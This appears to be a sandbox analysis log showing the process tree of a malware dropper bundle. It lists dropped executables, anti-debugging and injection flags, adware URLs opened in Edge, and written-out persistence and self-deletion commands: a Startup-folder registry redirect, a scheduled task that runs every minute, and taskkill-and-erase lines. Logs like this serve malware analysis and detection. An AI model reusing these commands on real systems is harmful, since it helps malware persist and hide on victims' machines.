C:\Users\Admin\Pictures\Adobe Films\Xf_zx9O1XjyURUhCmLjojbZL.exe"C:\Users\Admin\Pictures\Adobe Films\Xf_zx9O1XjyURUhCmLjojbZL.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 5607⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\UeuBMbC_JvHWFwRUeq1Z4yhO.exe"C:\Users\Admin\Pictures\Adobe Films\UeuBMbC_JvHWFwRUeq1Z4yhO.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\vrDet9OfjstR25razE2Nylyc.exe"C:\Users\Admin\Pictures\Adobe Films\vrDet9OfjstR25razE2Nylyc.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\SPbqmysrbDmwN9BKwv6anVMQ.exe"C:\Users\Admin\Pictures\Adobe Films\SPbqmysrbDmwN9BKwv6anVMQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\SPbqmysrbDmwN9BKwv6anVMQ.exe"C:\Users\Admin\Pictures\Adobe Films\SPbqmysrbDmwN9BKwv6anVMQ.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\ey4uvXWEOUalkU_eykdaluyu.exe"C:\Users\Admin\Pictures\Adobe Films\ey4uvXWEOUalkU_eykdaluyu.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6564 -s 16807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\kwpQoqQ0RdrnOPfE49tQ0tRM.exe"C:\Users\Admin\Pictures\Adobe Films\kwpQoqQ0RdrnOPfE49tQ0tRM.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DRRE8.tmp\kwpQoqQ0RdrnOPfE49tQ0tRM.tmp"C:\Users\Admin\AppData\Local\Temp\is-DRRE8.tmp\kwpQoqQ0RdrnOPfE49tQ0tRM.tmp" /SL5="$10334,506127,422400,C:\Users\Admin\Pictures\Adobe Films\kwpQoqQ0RdrnOPfE49tQ0tRM.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-ERGV2.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-ERGV2.tmp\lakazet.exe" /S /UID=27098⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\e2-aa5ba-d6f-032b4-3e82b65a16446\Sylaezhaetelo.exe"C:\Users\Admin\AppData\Local\Temp\e2-aa5ba-d6f-032b4-3e82b65a16446\Sylaezhaetelo.exe"9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a3471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad10⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a3471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe0,0x104,0x108,0xa0,0x10c,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a3471811⤵
-
C:\Users\Admin\AppData\Local\Temp\b4-639c8-9a8-b77be-987e4d6fd2ba1\Pogodybaely.exe"C:\Users\Admin\AppData\Local\Temp\b4-639c8-9a8-b77be-987e4d6fd2ba1\Pogodybaely.exe"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hs0lmzl3.0tl\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\hs0lmzl3.0tl\installer.exeC:\Users\Admin\AppData\Local\Temp\hs0lmzl3.0tl\installer.exe /qn CAMPAIGN="654"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5b14ueck.yuw\any.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\5b14ueck.yuw\any.exeC:\Users\Admin\AppData\Local\Temp\5b14ueck.yuw\any.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\5b14ueck.yuw\any.exe"C:\Users\Admin\AppData\Local\Temp\5b14ueck.yuw\any.exe" -u12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exe /mixfive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exe /mixfive11⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exe /mixfive12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exe" & exit13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f14⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aoz0k4r3.zc2\autosubplayer.exe /S & exit10⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rbjuj1q2.1o3\installer.exe /qn CAMPAIGN=654 & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\rbjuj1q2.1o3\installer.exeC:\Users\Admin\AppData\Local\Temp\rbjuj1q2.1o3\installer.exe /qn CAMPAIGN=65411⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\rbjuj1q2.1o3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\rbjuj1q2.1o3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1636565878 /qn CAMPAIGN=654 " CAMPAIGN="654"12⤵
- Enumerates connected drives
-
C:\Program Files\MSBuild\JMQTECCOCB\foldershare.exe"C:\Program Files\MSBuild\JMQTECCOCB\foldershare.exe" /VERYSILENT9⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\Pictures\Adobe Films\Sg5zNg8pvLcFbf509SrSiImk.exe"C:\Users\Admin\Pictures\Adobe Films\Sg5zNg8pvLcFbf509SrSiImk.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"8⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x208,0x20c,0x210,0x1e4,0x214,0x7ffcbb22dec0,0x7ffcbb22ded0,0x7ffcbb22dee09⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1608 /prefetch:29⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=1760 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2400 /prefetch:19⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=2180 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2524 /prefetch:19⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=2492 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3188 /prefetch:29⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=3680 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=2636 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=1560 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=1480 /prefetch:89⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1682c535a6fcb6e7.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1682c535a6fcb6e7.exeSat1682c535a6fcb6e7.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2846⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1612020d5c.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1612020d5c.exeSat1612020d5c.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\7⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\8⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat163b771375.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat163b771375.exeSat163b771375.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat163b771375.exe"C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat163b771375.exe" -u6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat16066e28b50208.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16066e28b50208.exeSat16066e28b50208.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16066e28b50208.exeC:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16066e28b50208.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1624bfc23ff9f.exe /mixtwo4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1624bfc23ff9f.exeSat1624bfc23ff9f.exe /mixtwo5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1624bfc23ff9f.exeSat1624bfc23ff9f.exe /mixtwo6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat1624bfc23ff9f.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1624bfc23ff9f.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sat1624bfc23ff9f.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat160ff2e199851.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat160ff2e199851.exeSat160ff2e199851.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 18606⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat16156abf9c.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16156abf9c.exeSat16156abf9c.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 2846⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1637cdb9d96.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1637cdb9d96.exeSat1637cdb9d96.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\AhWVemGiKw7SpgUWHHpZkjyt.exe"C:\Users\Admin\Pictures\Adobe Films\AhWVemGiKw7SpgUWHHpZkjyt.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat16af470129.exe4⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe fcb5a9b066a67e58a6b11c76f5aa06e9 PoCBdPX16U6ODzUp3gO8FQ.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16af470129.exeSat16af470129.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-L6HEG.tmp\Sat16af470129.tmp"C:\Users\Admin\AppData\Local\Temp\is-L6HEG.tmp\Sat16af470129.tmp" /SL5="$20162,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16af470129.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-3J62J.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-3J62J.tmp\lakazet.exe" /S /UID=27203⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\ff-a24a0-33b-f8a9b-2ef30998056b6\Bovikunipu.exe"C:\Users\Admin\AppData\Local\Temp\ff-a24a0-33b-f8a9b-2ef30998056b6\Bovikunipu.exe"4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e65⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a347186⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:36⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:16⤵
-
